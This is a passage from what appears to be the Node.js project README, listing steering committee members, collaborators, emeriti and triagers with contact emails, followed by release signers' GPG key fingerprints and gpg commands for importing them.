**Geoffrey Booth** <<webadmin@geoffreybooth.com>> (he/him)
* [gireeshpunathil](https://github.com/gireeshpunathil) -
**Gireesh Punathil** <<gpunathi@in.ibm.com>> (he/him)
* [jasnell](https://github.com/jasnell) -
**James M Snell** <<jasnell@gmail.com>> (he/him)
* [joyeecheung](https://github.com/joyeecheung) -
**Joyee Cheung** <<joyeec9h3@gmail.com>> (she/her)
* [legendecas](https://github.com/legendecas) -
**Chengzhong Wu** <<legendecas@gmail.com>> (he/him)
* [mcollina](https://github.com/mcollina) -
**Matteo Collina** <<matteo.collina@gmail.com>> (he/him)
* [mhdawson](https://github.com/mhdawson) -
**Michael Dawson** <<midawson@redhat.com>> (he/him)
* [MoLow](https://github.com/MoLow) -
**Moshe Atlow** <<moshe@atlow.co.il>> (he/him)
* [RafaelGSS](https://github.com/RafaelGSS) -
**Rafael Gonzaga** <<rafael.nunu@hotmail.com>> (he/him)
* [RaisinTen](https://github.com/RaisinTen) -
**Darshan Sen** <<raisinten@gmail.com>> (he/him)
* [richardlau](https://github.com/richardlau) -
**Richard Lau** <<rlau@redhat.com>>
* [ronag](https://github.com/ronag) -
**Robert Nagy** <<ronagy@icloud.com>>
* [ruyadorno](https://github.com/ruyadorno) -
**Ruy Adorno** <<ruyadorno@google.com>> (he/him)
* [targos](https://github.com/targos) -
**Michaël Zasso** <<targos@protonmail.com>> (he/him)
* [tniessen](https://github.com/tniessen) -
**Tobias Nießen** <<tniessen@tnie.de>> (he/him)
* [Trott](https://github.com/Trott) -
**Rich Trott** <<rtrott@gmail.com>> (he/him)
#### TSC regular members
* [BethGriggs](https://github.com/BethGriggs) -
**Beth Griggs** <<bethanyngriggs@gmail.com>> (she/her)
* [bnoordhuis](https://github.com/bnoordhuis) -
**Ben Noordhuis** <<info@bnoordhuis.nl>>
* [ChALkeR](https://github.com/ChALkeR) -
**Сковорода Никита Андреевич** <<chalkerx@gmail.com>> (he/him)
* [codebytere](https://github.com/codebytere) -
**Shelley Vohr** <<shelley.vohr@gmail.com>> (she/her)
* [danbev](https://github.com/danbev) -
**Daniel Bevenius** <<daniel.bevenius@gmail.com>> (he/him)
* [fhinkel](https://github.com/fhinkel) -
**Franziska Hinkelmann** <<franziska.hinkelmann@gmail.com>> (she/her)
* [gabrielschulhof](https://github.com/gabrielschulhof) -
**Gabriel Schulhof** <<gabrielschulhof@gmail.com>>
* [mscdex](https://github.com/mscdex) -
**Brian White** <<mscdex@mscdex.net>>
* [MylesBorins](https://github.com/MylesBorins) -
**Myles Borins** <<myles.borins@gmail.com>> (he/him)
* [rvagg](https://github.com/rvagg) -
**Rod Vagg** <<r@va.gg>>
* [TimothyGu](https://github.com/TimothyGu) -
**Tiancheng "Timothy" Gu** <<timothygu99@gmail.com>> (he/him)
<details>
<summary>TSC emeriti members</summary>
#### TSC emeriti members
* [addaleax](https://github.com/addaleax) -
**Anna Henningsen** <<anna@addaleax.net>> (she/her)
* [chrisdickinson](https://github.com/chrisdickinson) -
**Chris Dickinson** <<christopher.s.dickinson@gmail.com>>
* [evanlucas](https://github.com/evanlucas) -
**Evan Lucas** <<evanlucas@me.com>> (he/him)
* [Fishrock123](https://github.com/Fishrock123) -
**Jeremiah Senkpiel** <<fishrock123@rocketmail.com>> (he/they)
* [gibfahn](https://github.com/gibfahn) -
**Gibson Fahnestock** <<gibfahn@gmail.com>> (he/him)
* [indutny](https://github.com/indutny) -
**Fedor Indutny** <<fedor@indutny.com>>
* [isaacs](https://github.com/isaacs) -
**Isaac Z. Schlueter** <<i@izs.me>>
* [joshgav](https://github.com/joshgav) -
**Josh Gavant** <<josh.gavant@outlook.com>>
* [mmarchini](https://github.com/mmarchini) -
**Mary Marchini** <<oss@mmarchini.me>> (she/her)
* [nebrius](https://github.com/nebrius) -
**Bryan Hughes** <<bryan@nebri.us>>
* [ofrobots](https://github.com/ofrobots) -
**Ali Ijaz Sheikh** <<ofrobots@google.com>> (he/him)
* [orangemocha](https://github.com/orangemocha) -
**Alexis Campailla** <<orangemocha@nodejs.org>>
* [piscisaureus](https://github.com/piscisaureus) -
**Bert Belder** <<bertbelder@gmail.com>>
* [sam-github](https://github.com/sam-github) -
**Sam Roberts** <<vieuxtech@gmail.com>>
* [shigeki](https://github.com/shigeki) -
**Shigeki Ohtsu** <<ohtsu@ohtsu.org>> (he/him)
* [thefourtheye](https://github.com/thefourtheye) -
**Sakthipriyan Vairamani** <<thechargingvolcano@gmail.com>> (he/him)
* [trevnorris](https://github.com/trevnorris) -
**Trevor Norris** <<trev.norris@gmail.com>>
</details>
<!-- node-core-utils and find-inactive-collaborators.mjs depend on the format
of the collaborator list. If the format changes, those utilities need to be
tested and updated. -->
### Collaborators
* [addaleax](https://github.com/addaleax) -
**Anna Henningsen** <<anna@addaleax.net>> (she/her)
* [aduh95](https://github.com/aduh95) -
**Antoine du Hamel** <<duhamelantoine1995@gmail.com>> (he/him)
* [anonrig](https://github.com/anonrig) -
**Yagiz Nizipli** <<yagiz@nizipli.com>> (he/him)
* [antsmartian](https://github.com/antsmartian) -
**Anto Aravinth** <<anto.aravinth.cse@gmail.com>> (he/him)
* [apapirovski](https://github.com/apapirovski) -
**Anatoli Papirovski** <<apapirovski@mac.com>> (he/him)
* [AshCripps](https://github.com/AshCripps) -
**Ash Cripps** <<email@ashleycripps.co.uk>>
* [atlowChemi](https://github.com/atlowChemi) -
**Chemi Atlow** <<chemi@atlow.co.il>> (he/him)
* [Ayase-252](https://github.com/Ayase-252) -
**Qingyu Deng** <<i@ayase-lab.com>>
* [bengl](https://github.com/bengl) -
**Bryan English** <<bryan@bryanenglish.com>> (he/him)
* [benjamingr](https://github.com/benjamingr) -
**Benjamin Gruenbaum** <<benjamingr@gmail.com>>
* [BethGriggs](https://github.com/BethGriggs) -
**Beth Griggs** <<bethanyngriggs@gmail.com>> (she/her)
* [bmeck](https://github.com/bmeck) -
**Bradley Farias** <<bradley.meck@gmail.com>>
* [bnb](https://github.com/bnb) -
**Tierney Cyren** <<hello@bnb.im>> (they/he)
* [bnoordhuis](https://github.com/bnoordhuis) -
**Ben Noordhuis** <<info@bnoordhuis.nl>>
* [BridgeAR](https://github.com/BridgeAR) -
**Ruben Bridgewater** <<ruben@bridgewater.de>> (he/him)
* [cclauss](https://github.com/cclauss) -
**Christian Clauss** <<cclauss@me.com>> (he/him)
* [ChALkeR](https://github.com/ChALkeR) -
**Сковорода Никита Андреевич** <<chalkerx@gmail.com>> (he/him)
* [cjihrig](https://github.com/cjihrig) -
**Colin Ihrig** <<cjihrig@gmail.com>> (he/him)
* [codebytere](https://github.com/codebytere) -
**Shelley Vohr** <<shelley.vohr@gmail.com>> (she/her)
* [cola119](https://github.com/cola119) -
**Kohei Ueno** <<kohei.ueno119@gmail.com>> (he/him)
* [daeyeon](https://github.com/daeyeon) -
**Daeyeon Jeong** <<daeyeon.dev@gmail.com>> (he/him)
* [danbev](https://github.com/danbev) -
**Daniel Bevenius** <<daniel.bevenius@gmail.com>> (he/him)
* [danielleadams](https://github.com/danielleadams) -
**Danielle Adams** <<adamzdanielle@gmail.com>> (she/her)
* [debadree25](https://github.com/debadree25) -
**Debadree Chatterjee** <<debadree333@gmail.com>> (he/him)
* [deokjinkim](https://github.com/deokjinkim) -
**Deokjin Kim** <<deokjin81.kim@gmail.com>> (he/him)
* [devnexen](https://github.com/devnexen) -
**David Carlier** <<devnexen@gmail.com>>
* [devsnek](https://github.com/devsnek) -
**Gus Caplan** <<me@gus.host>> (they/them)
* [edsadr](https://github.com/edsadr) -
**Adrian Estrada** <<edsadr@gmail.com>> (he/him)
* [erickwendel](https://github.com/erickwendel) -
**Erick Wendel** <<erick.workspace@gmail.com>> (he/him)
* [fhinkel](https://github.com/fhinkel) -
**Franziska Hinkelmann** <<franziska.hinkelmann@gmail.com>> (she/her)
* [F3n67u](https://github.com/F3n67u) -
**Feng Yu** <<F3n67u@outlook.com>> (he/him)
* [Flarna](https://github.com/Flarna) -
**Gerhard Stöbich** <<deb2001-github@yahoo.de>> (he/they)
* [gabrielschulhof](https://github.com/gabrielschulhof) -
**Gabriel Schulhof** <<gabrielschulhof@gmail.com>>
* [gengjiawen](https://github.com/gengjiawen) -
**Jiawen Geng** <<technicalcute@gmail.com>>
* [GeoffreyBooth](https://github.com/geoffreybooth) -
**Geoffrey Booth** <<webadmin@geoffreybooth.com>> (he/him)
* [gireeshpunathil](https://github.com/gireeshpunathil) -
**Gireesh Punathil** <<gpunathi@in.ibm.com>> (he/him)
* [guybedford](https://github.com/guybedford) -
**Guy Bedford** <<guybedford@gmail.com>> (he/him)
* [HarshithaKP](https://github.com/HarshithaKP) -
**Harshitha K P** <<harshitha014@gmail.com>> (she/her)
* [himself65](https://github.com/himself65) -
**Zeyu "Alex" Yang** <<himself65@outlook.com>> (he/him)
* [iansu](https://github.com/iansu) -
**Ian Sutherland** <<ian@iansutherland.ca>>
* [JacksonTian](https://github.com/JacksonTian) -
**Jackson Tian** <<shyvo1987@gmail.com>>
* [JakobJingleheimer](https://github.com/JakobJingleheimer) -
**Jacob Smith** <<jacob@frende.me>> (he/him)
* [jasnell](https://github.com/jasnell) -
**James M Snell** <<jasnell@gmail.com>> (he/him)
* [jkrems](https://github.com/jkrems) -
**Jan Krems** <<jan.krems@gmail.com>> (he/him)
* [joesepi](https://github.com/joesepi) -
**Joe Sepi** <<sepi@joesepi.com>> (he/him)
* [joyeecheung](https://github.com/joyeecheung) -
**Joyee Cheung** <<joyeec9h3@gmail.com>> (she/her)
* [juanarbol](https://github.com/juanarbol) -
**Juan José Arboleda** <<soyjuanarbol@gmail.com>> (he/him)
* [JungMinu](https://github.com/JungMinu) -
**Minwoo Jung** <<nodecorelab@gmail.com>> (he/him)
* [KhafraDev](https://github.com/KhafraDev) -
**Matthew Aitken** <<maitken033380023@gmail.com>> (he/him)
* [kuriyosh](https://github.com/kuriyosh) -
**Yoshiki Kurihara** <<yosyos0306@gmail.com>> (he/him)
* [kvakil](https://github.com/kvakil) -
**Keyhan Vakil** <<kvakil@sylph.kvakil.me>>
* [legendecas](https://github.com/legendecas) -
**Chengzhong Wu** <<legendecas@gmail.com>> (he/him)
* [Leko](https://github.com/Leko) -
**Shingo Inoue** <<leko.noor@gmail.com>> (he/him)
* [linkgoron](https://github.com/linkgoron) -
**Nitzan Uziely** <<linkgoron@gmail.com>>
* [LiviaMedeiros](https://github.com/LiviaMedeiros) -
**LiviaMedeiros** <<livia@cirno.name>>
* [lpinca](https://github.com/lpinca) -
**Luigi Pinca** <<luigipinca@gmail.com>> (he/him)
* [lukekarrys](https://github.com/lukekarrys) -
**Luke Karrys** <<luke@lukekarrys.com>> (he/him)
* [Lxxyx](https://github.com/Lxxyx) -
**Zijian Liu** <<lxxyxzj@gmail.com>> (he/him)
* [marco-ippolito](https://github.com/marco-ippolito) -
**Marco Ippolito** <<marcoippolito54@gmail.com>> (he/him)
* [marsonya](https://github.com/marsonya) -
**Akhil Marsonya** <<akhil.marsonya27@gmail.com>> (he/him)
* [mcollina](https://github.com/mcollina) -
**Matteo Collina** <<matteo.collina@gmail.com>> (he/him)
* [meixg](https://github.com/meixg) -
**Xuguang Mei** <<meixuguang@gmail.com>> (he/him)
* [Mesteery](https://github.com/Mesteery) -
**Mestery** <<mestery@protonmail.com>> (he/him)
* [mhdawson](https://github.com/mhdawson) -
**Michael Dawson** <<midawson@redhat.com>> (he/him)
* [miladfarca](https://github.com/miladfarca) -
**Milad Fa** <<mfarazma@redhat.com>> (he/him)
* [mildsunrise](https://github.com/mildsunrise) -
**Alba Mendez** <<me@alba.sh>> (she/her)
* [MoLow](https://github.com/MoLow) -
**Moshe Atlow** <<moshe@atlow.co.il>> (he/him)
* [mscdex](https://github.com/mscdex) -
**Brian White** <<mscdex@mscdex.net>>
* [MylesBorins](https://github.com/MylesBorins) -
**Myles Borins** <<myles.borins@gmail.com>> (he/him)
* [ovflowd](https://github.com/ovflowd) -
**Claudio Wunder** <<cwunder@gnome.org>> (he/they)
* [oyyd](https://github.com/oyyd) -
**Ouyang Yadong** <<oyydoibh@gmail.com>> (he/him)
* [panva](https://github.com/panva) -
**Filip Skokan** <<panva.ip@gmail.com>> (he/him)
* [Qard](https://github.com/Qard) -
**Stephen Belanger** <<admin@stephenbelanger.com>> (he/him)
* [RafaelGSS](https://github.com/RafaelGSS) -
**Rafael Gonzaga** <<rafael.nunu@hotmail.com>> (he/him)
* [RaisinTen](https://github.com/RaisinTen) -
**Darshan Sen** <<raisinten@gmail.com>> (he/him)
* [richardlau](https://github.com/richardlau) -
**Richard Lau** <<rlau@redhat.com>>
* [rickyes](https://github.com/rickyes) -
**Ricky Zhou** <<0x19951125@gmail.com>> (he/him)
* [ronag](https://github.com/ronag) -
**Robert Nagy** <<ronagy@icloud.com>>
* [ruyadorno](https://github.com/ruyadorno) -
**Ruy Adorno** <<ruyadorno@google.com>> (he/him)
* [rvagg](https://github.com/rvagg) -
**Rod Vagg** <<rod@vagg.org>>
* [ryzokuken](https://github.com/ryzokuken) -
**Ujjwal Sharma** <<ryzokuken@disroot.org>> (he/him)
* [santigimeno](https://github.com/santigimeno) -
**Santiago Gimeno** <<santiago.gimeno@gmail.com>>
* [shisama](https://github.com/shisama) -
**Masashi Hirano** <<shisama07@gmail.com>> (he/him)
* [ShogunPanda](https://github.com/ShogunPanda) -
**Paolo Insogna** <<paolo@cowtech.it>> (he/him)
* [srl295](https://github.com/srl295) -
**Steven R Loomis** <<srl295@gmail.com>>
* [sxa](https://github.com/sxa) -
**Stewart X Addison** <<sxa@redhat.com>> (he/him)
* [targos](https://github.com/targos) -
**Michaël Zasso** <<targos@protonmail.com>> (he/him)
* [theanarkh](https://github.com/theanarkh) -
**theanarkh** <<theratliter@gmail.com>> (he/him)
* [TimothyGu](https://github.com/TimothyGu) -
**Tiancheng "Timothy" Gu** <<timothygu99@gmail.com>> (he/him)
* [tniessen](https://github.com/tniessen) -
**Tobias Nießen** <<tniessen@tnie.de>> (he/him)
* [trivikr](https://github.com/trivikr) -
**Trivikram Kamat** <<trivikr.dev@gmail.com>>
* [Trott](https://github.com/Trott) -
**Rich Trott** <<rtrott@gmail.com>> (he/him)
* [vdeturckheim](https://github.com/vdeturckheim) -
**Vladimir de Turckheim** <<vlad2t@hotmail.com>> (he/him)
* [vmoroz](https://github.com/vmoroz) -
**Vladimir Morozov** <<vmorozov@microsoft.com>> (he/him)
* [VoltrexKeyva](https://github.com/VoltrexKeyva) -
**Mohammed Keyvanzadeh** <<mohammadkeyvanzade94@gmail.com>> (he/him)
* [watilde](https://github.com/watilde) -
**Daijiro Wachi** <<daijiro.wachi@gmail.com>> (he/him)
* [XadillaX](https://github.com/XadillaX) -
**Khaidi Chu** <<i@2333.moe>> (he/him)
* [yashLadha](https://github.com/yashLadha) -
**Yash Ladha** <<yash@yashladha.in>> (he/him)
* [ZYSzys](https://github.com/ZYSzys) -
**Yongsheng Zhang** <<zyszys98@gmail.com>> (he/him)
<details>
<summary>Emeriti</summary>
<!-- find-inactive-collaborators.mjs depends on the format of the emeriti list.
If the format changes, those utilities need to be tested and updated. -->
### Collaborator emeriti
* [ak239](https://github.com/ak239) -
**Aleksei Koziatinskii** <<ak239spb@gmail.com>>
* [andrasq](https://github.com/andrasq) -
**Andras** <<andras@kinvey.com>>
* [AnnaMag](https://github.com/AnnaMag) -
**Anna M. Kedzierska** <<anna.m.kedzierska@gmail.com>>
* [AndreasMadsen](https://github.com/AndreasMadsen) -
**Andreas Madsen** <<amwebdk@gmail.com>> (he/him)
* [aqrln](https://github.com/aqrln) -
**Alexey Orlenko** <<eaglexrlnk@gmail.com>> (he/him)
* [bcoe](https://github.com/bcoe) -
**Ben Coe** <<bencoe@gmail.com>> (he/him)
* [bmeurer](https://github.com/bmeurer) -
**Benedikt Meurer** <<benedikt.meurer@gmail.com>>
* [boneskull](https://github.com/boneskull) -
**Christopher Hiller** <<boneskull@boneskull.com>> (he/him)
* [brendanashworth](https://github.com/brendanashworth) -
**Brendan Ashworth** <<brendan.ashworth@me.com>>
* [bzoz](https://github.com/bzoz) -
**Bartosz Sosnowski** <<bartosz@janeasystems.com>>
* [calvinmetcalf](https://github.com/calvinmetcalf) -
**Calvin Metcalf** <<calvin.metcalf@gmail.com>>
* [chrisdickinson](https://github.com/chrisdickinson) -
**Chris Dickinson** <<christopher.s.dickinson@gmail.com>>
* [claudiorodriguez](https://github.com/claudiorodriguez) -
**Claudio Rodriguez** <<cjrodr@yahoo.com>>
* [DavidCai1993](https://github.com/DavidCai1993) -
**David Cai** <<davidcai1993@yahoo.com>> (he/him)
* [davisjam](https://github.com/davisjam) -
**Jamie Davis** <<davisjam@vt.edu>> (he/him)
* [digitalinfinity](https://github.com/digitalinfinity) -
**Hitesh Kanwathirtha** <<digitalinfinity@gmail.com>> (he/him)
* [dmabupt](https://github.com/dmabupt) -
**Xu Meng** <<dmabupt@gmail.com>> (he/him)
* [dnlup](https://github.com/dnlup)
**dnlup** <<dnlup.dev@gmail.com>>
* [eljefedelrodeodeljefe](https://github.com/eljefedelrodeodeljefe) -
**Robert Jefe Lindstaedt** <<robert.lindstaedt@gmail.com>>
* [estliberitas](https://github.com/estliberitas) -
**Alexander Makarenko** <<estliberitas@gmail.com>>
* [eugeneo](https://github.com/eugeneo) -
**Eugene Ostroukhov** <<eostroukhov@google.com>>
* [evanlucas](https://github.com/evanlucas) -
**Evan Lucas** <<evanlucas@me.com>> (he/him)
* [firedfox](https://github.com/firedfox) -
**Daniel Wang** <<wangyang0123@gmail.com>>
* [Fishrock123](https://github.com/Fishrock123) -
**Jeremiah Senkpiel** <<fishrock123@rocketmail.com>> (he/they)
* [gdams](https://github.com/gdams) -
**George Adams** <<gadams@microsoft.com>> (he/him)
* [geek](https://github.com/geek) -
**Wyatt Preul** <<wpreul@gmail.com>>
* [gibfahn](https://github.com/gibfahn) -
**Gibson Fahnestock** <<gibfahn@gmail.com>> (he/him)
* [glentiki](https://github.com/glentiki) -
**Glen Keane** <<glenkeane.94@gmail.com>> (he/him)
* [hashseed](https://github.com/hashseed) -
**Yang Guo** <<yangguo@chromium.org>> (he/him)
* [hiroppy](https://github.com/hiroppy) -
**Yuta Hiroto** <<hello@hiroppy.me>> (he/him)
* [iarna](https://github.com/iarna) -
**Rebecca Turner** <<me@re-becca.org>>
* [imran-iq](https://github.com/imran-iq) -
**Imran Iqbal** <<imran@imraniqbal.org>>
* [imyller](https://github.com/imyller) -
**Ilkka Myller** <<ilkka.myller@nodefield.com>>
* [indutny](https://github.com/indutny) -
**Fedor Indutny** <<fedor@indutny.com>>
* [isaacs](https://github.com/isaacs) -
**Isaac Z. Schlueter** <<i@izs.me>>
* [italoacasas](https://github.com/italoacasas) -
**Italo A. Casas** <<me@italoacasas.com>> (he/him)
* [jasongin](https://github.com/jasongin) -
**Jason Ginchereau** <<jasongin@microsoft.com>>
* [jbergstroem](https://github.com/jbergstroem) -
**Johan Bergström** <<bugs@bergstroem.nu>>
* [jdalton](https://github.com/jdalton) -
**John-David Dalton** <<john.david.dalton@gmail.com>>
* [jhamhader](https://github.com/jhamhader) -
**Yuval Brik** <<yuval@brik.org.il>>
* [joaocgreis](https://github.com/joaocgreis) -
**João Reis** <<reis@janeasystems.com>>
* [joshgav](https://github.com/joshgav) -
**Josh Gavant** <<josh.gavant@outlook.com>>
* [julianduque](https://github.com/julianduque) -
**Julian Duque** <<julianduquej@gmail.com>> (he/him)
* [kfarnung](https://github.com/kfarnung) -
**Kyle Farnung** <<kfarnung@microsoft.com>> (he/him)
* [kunalspathak](https://github.com/kunalspathak) -
**Kunal Pathak** <<kunal.pathak@microsoft.com>>
* [lance](https://github.com/lance) -
**Lance Ball** <<lball@redhat.com>> (he/him)
* [lucamaraschi](https://github.com/lucamaraschi) -
**Luca Maraschi** <<luca.maraschi@gmail.com>> (he/him)
* [lundibundi](https://github.com/lundibundi) -
**Denys Otrishko** <<shishugi@gmail.com>> (he/him)
* [lxe](https://github.com/lxe) -
**Aleksey Smolenchuk** <<lxe@lxe.co>>
* [maclover7](https://github.com/maclover7) -
**Jon Moss** <<me@jonathanmoss.me>> (he/him)
* [mafintosh](https://github.com/mafintosh) -
**Mathias Buus** <<mathiasbuus@gmail.com>> (he/him)
* [matthewloring](https://github.com/matthewloring) -
**Matthew Loring** <<mattloring@google.com>>
* [micnic](https://github.com/micnic) -
**Nicu Micleușanu** <<micnic90@gmail.com>> (he/him)
* [mikeal](https://github.com/mikeal) -
**Mikeal Rogers** <<mikeal.rogers@gmail.com>>
* [misterdjules](https://github.com/misterdjules) -
**Julien Gilli** <<jgilli@netflix.com>>
* [mmarchini](https://github.com/mmarchini) -
**Mary Marchini** <<oss@mmarchini.me>> (she/her)
* [monsanto](https://github.com/monsanto) -
**Christopher Monsanto** <<chris@monsan.to>>
* [MoonBall](https://github.com/MoonBall) -
**Chen Gang** <<gangc.cxy@foxmail.com>>
* [not-an-aardvark](https://github.com/not-an-aardvark) -
**Teddy Katz** <<teddy.katz@gmail.com>> (he/him)
* [ofrobots](https://github.com/ofrobots) -
**Ali Ijaz Sheikh** <<ofrobots@google.com>> (he/him)
* [Olegas](https://github.com/Olegas) -
**Oleg Elifantiev** <<oleg@elifantiev.ru>>
* [orangemocha](https://github.com/orangemocha) -
**Alexis Campailla** <<orangemocha@nodejs.org>>
* [othiym23](https://github.com/othiym23) -
**Forrest L Norvell** <<ogd@aoaioxxysz.net>> (they/them/themself)
* [petkaantonov](https://github.com/petkaantonov) -
**Petka Antonov** <<petka_antonov@hotmail.com>>
* [phillipj](https://github.com/phillipj) -
**Phillip Johnsen** <<johphi@gmail.com>>
* [piscisaureus](https://github.com/piscisaureus) -
**Bert Belder** <<bertbelder@gmail.com>>
* [pmq20](https://github.com/pmq20) -
**Minqi Pan** <<pmq2001@gmail.com>>
* [PoojaDurgad](https://github.com/PoojaDurgad) -
**Pooja D P** <<Pooja.D.P@ibm.com>> (she/her)
* [princejwesley](https://github.com/princejwesley) -
**Prince John Wesley** <<princejohnwesley@gmail.com>>
* [psmarshall](https://github.com/psmarshall) -
**Peter Marshall** <<petermarshall@chromium.org>> (he/him)
* [puzpuzpuz](https://github.com/puzpuzpuz) -
**Andrey Pechkurov** <<apechkurov@gmail.com>> (he/him)
* [refack](https://github.com/refack) -
**Refael Ackermann (רפאל פלחי)** <<refack@gmail.com>> (he/him/הוא/אתה)
* [rexagod](https://github.com/rexagod) -
**Pranshu Srivastava** <<rexagod@gmail.com>> (he/him)
* [rlidwka](https://github.com/rlidwka) -
**Alex Kocharin** <<alex@kocharin.ru>>
* [rmg](https://github.com/rmg) -
**Ryan Graham** <<r.m.graham@gmail.com>>
* [robertkowalski](https://github.com/robertkowalski) -
**Robert Kowalski** <<rok@kowalski.gd>>
* [romankl](https://github.com/romankl) -
**Roman Klauke** <<romaaan.git@gmail.com>>
* [ronkorving](https://github.com/ronkorving) -
**Ron Korving** <<ron@ronkorving.nl>>
* [RReverser](https://github.com/RReverser) -
**Ingvar Stepanyan** <<me@rreverser.com>>
* [rubys](https://github.com/rubys) -
**Sam Ruby** <<rubys@intertwingly.net>>
* [saghul](https://github.com/saghul) -
**Saúl Ibarra Corretgé** <<s@saghul.net>>
* [sam-github](https://github.com/sam-github) -
**Sam Roberts** <<vieuxtech@gmail.com>>
* [sebdeckers](https://github.com/sebdeckers) -
**Sebastiaan Deckers** <<sebdeckers83@gmail.com>>
* [seishun](https://github.com/seishun) -
**Nikolai Vavilov** <<vvnicholas@gmail.com>>
* [shigeki](https://github.com/shigeki) -
**Shigeki Ohtsu** <<ohtsu@ohtsu.org>> (he/him)
* [silverwind](https://github.com/silverwind) -
**Roman Reiss** <<me@silverwind.io>>
* [starkwang](https://github.com/starkwang) -
**Weijia Wang** <<starkwang@126.com>>
* [stefanmb](https://github.com/stefanmb) -
**Stefan Budeanu** <<stefan@budeanu.com>>
* [tellnes](https://github.com/tellnes) -
**Christian Tellnes** <<christian@tellnes.no>>
* [thefourtheye](https://github.com/thefourtheye) -
**Sakthipriyan Vairamani** <<thechargingvolcano@gmail.com>> (he/him)
* [thlorenz](https://github.com/thlorenz) -
**Thorsten Lorenz** <<thlorenz@gmx.de>>
* [trevnorris](https://github.com/trevnorris) -
**Trevor Norris** <<trev.norris@gmail.com>>
* [tunniclm](https://github.com/tunniclm) -
**Mike Tunnicliffe** <<m.j.tunnicliffe@gmail.com>>
* [vkurchatkin](https://github.com/vkurchatkin) -
**Vladimir Kurchatkin** <<vladimir.kurchatkin@gmail.com>>
* [vsemozhetbyt](https://github.com/vsemozhetbyt) -
**Vse Mozhet Byt** <<vsemozhetbyt@gmail.com>> (he/him)
* [watson](https://github.com/watson) -
**Thomas Watson** <<w@tson.dk>>
* [whitlockjc](https://github.com/whitlockjc) -
**Jeremy Whitlock** <<jwhitlock@apache.org>>
* [yhwang](https://github.com/yhwang) -
**Yihong Wang** <<yh.wang@ibm.com>>
* [yorkie](https://github.com/yorkie) -
**Yorkie Liu** <<yorkiefixer@gmail.com>>
* [yosuke-furukawa](https://github.com/yosuke-furukawa) -
**Yosuke Furukawa** <<yosuke.furukawa@gmail.com>>
</details>
<!--lint enable prohibited-strings-->
Collaborators follow the [Collaborator Guide](./doc/contributing/collaborator-guide.md) in
maintaining the Node.js project.
### Triagers
* [atlowChemi](https://github.com/atlowChemi) -
**Chemi Atlow** <<chemi@atlow.co.il>> (he/him)
* [Ayase-252](https://github.com/Ayase-252) -
**Qingyu Deng** <<i@ayase-lab.com>>
* [bmuenzenmeyer](https://github.com/bmuenzenmeyer) -
**Brian Muenzenmeyer** <<brian.muenzenmeyer@gmail.com>> (he/him)
* [daeyeon](https://github.com/daeyeon) -
**Daeyeon Jeong** <<daeyeon.dev@gmail.com>> (he/him)
* [F3n67u](https://github.com/F3n67u) -
**Feng Yu** <<F3n67u@outlook.com>> (he/him)
* [himadriganguly](https://github.com/himadriganguly) -
**Himadri Ganguly** <<himadri.tech@gmail.com>> (he/him)
* [iam-frankqiu](https://github.com/iam-frankqiu) -
**Frank Qiu** <<iam.frankqiu@gmail.com>> (he/him)
* [marsonya](https://github.com/marsonya) -
**Akhil Marsonya** <<akhil.marsonya27@gmail.com>> (he/him)
* [meixg](https://github.com/meixg) -
**Xuguang Mei** <<meixuguang@gmail.com>> (he/him)
* [Mesteery](https://github.com/Mesteery) -
**Mestery** <<mestery@protonmail.com>> (he/him)
* [preveen-stack](https://github.com/preveen-stack) -
**Preveen Padmanabhan** <<wide4head@gmail.com>> (he/him)
* [PoojaDurgad](https://github.com/PoojaDurgad) -
**Pooja Durgad** <<Pooja.D.P@ibm.com>>
* [RaisinTen](https://github.com/RaisinTen) -
**Darshan Sen** <<raisinten@gmail.com>>
* [VoltrexKeyva](https://github.com/VoltrexKeyva) -
**Mohammed Keyvanzadeh** <<mohammadkeyvanzade94@gmail.com>> (he/him)
Triagers follow the [Triage Guide](./doc/contributing/issues.md#triaging-a-bug-report) when
responding to new issues.
### Release keys
Primary GPG keys for Node.js Releasers (some Releasers sign with subkeys):
* **Beth Griggs** <<bethanyngriggs@gmail.com>>
`4ED778F539E3634C779C87C6D7062848A1AB005C`
* **Bryan English** <<bryan@bryanenglish.com>>
`141F07595B7B3FFE74309A937405533BE57C7D57`
* **Danielle Adams** <<adamzdanielle@gmail.com>>
`74F12602B6F1C4E913FAA37AD3A89613643B6201`
* **Juan José Arboleda** <<soyjuanarbol@gmail.com>>
`DD792F5973C6DE52C432CBDAC77ABFA00DDBF2B7`
* **Michaël Zasso** <<targos@protonmail.com>>
`8FCCA13FEF1D0C2E91008E09770F7A9A5AE15600`
* **Myles Borins** <<myles.borins@gmail.com>>
`C4F0DFFF4E8C1A8236409D08E73BC641CC11F4C8`
* **RafaelGSS** <<rafael.nunu@hotmail.com>>
`890C08DB8579162FEE0DF9DB8BEAB4DFCF555EF4`
* **Richard Lau** <<rlau@redhat.com>>
`C82FA3AE1CBEDC6BE46B9360C43CEC45C17AB93C`
* **Ruy Adorno** <<ruyadorno@hotmail.com>>
`108F52B48DB57BB0CC439B2997B01419BD92F80A`
To import the full set of trusted release keys (including subkeys possibly used
to sign releases):
```bash
gpg --keyserver hkps://keys.openpgp.org --recv-keys 4ED778F539E3634C779C87C6D7062848A1AB005C
gpg --keyserver hkps://keys.openpgp.org --recv-keys 141F07595B7B3FFE74309A937405533BE57C7D57
gpg --keyserver hkps://keys.openpgp.org --recv-keys 74F12602B6F1C4E913FAA37AD3A89613643B6201
gpg --keyserver hkps://keys.openpgp.org --recv-keys DD792F5973C6DE52C432CBDAC77ABFA00DDBF2B7
gpg --keyserver hkps://keys.openpgp.org --recv-keys 8FCCA13FEF1D0C2E91008E09770F7A9A5AE15600
gpg --keyserver hkps://keys.openpgp.org --recv-keys C4F0DFFF4E8C1A8236409D08E73BC641CC11F4C8
gpg --keyserver hkps://keys.openpgp.org --recv-keys 890C08DB8579162FEE0DF9DB8BEAB4DFCF555EF4
gpg --keyserver hkps://keys.openpgp.org --recv-keys C82FA3AE1CBEDC6BE46B9360C43CEC45C17AB93C
gpg --keyserver hkps://keys.openpgp.org --recv-keys 108F52B48DB57BB0CC439B2997B01419BD92F80A
```
See [Verifying binaries](#verifying-binaries) for how to use these keys to
verify a downloaded file.
<details>
<summary>Other keys used to sign some previous releases</summary>
* **Chris Dickinson** <<christopher.s.dickinson@gmail.com>>
`9554F04D7259F04124DE6B476D5A82AC7E37093B`
* **Colin Ihrig** <<cjihrig@gmail.com>>
`94AE36675C464D64BAFA68DD7434390BDBE9B9C5`
* **Danielle Adams** <<adamzdanielle@gmail.com>>
`1C050899334244A8AF75E53792EF661D867B9DFA`
* **Evan Lucas** <<evanlucas@me.com>>
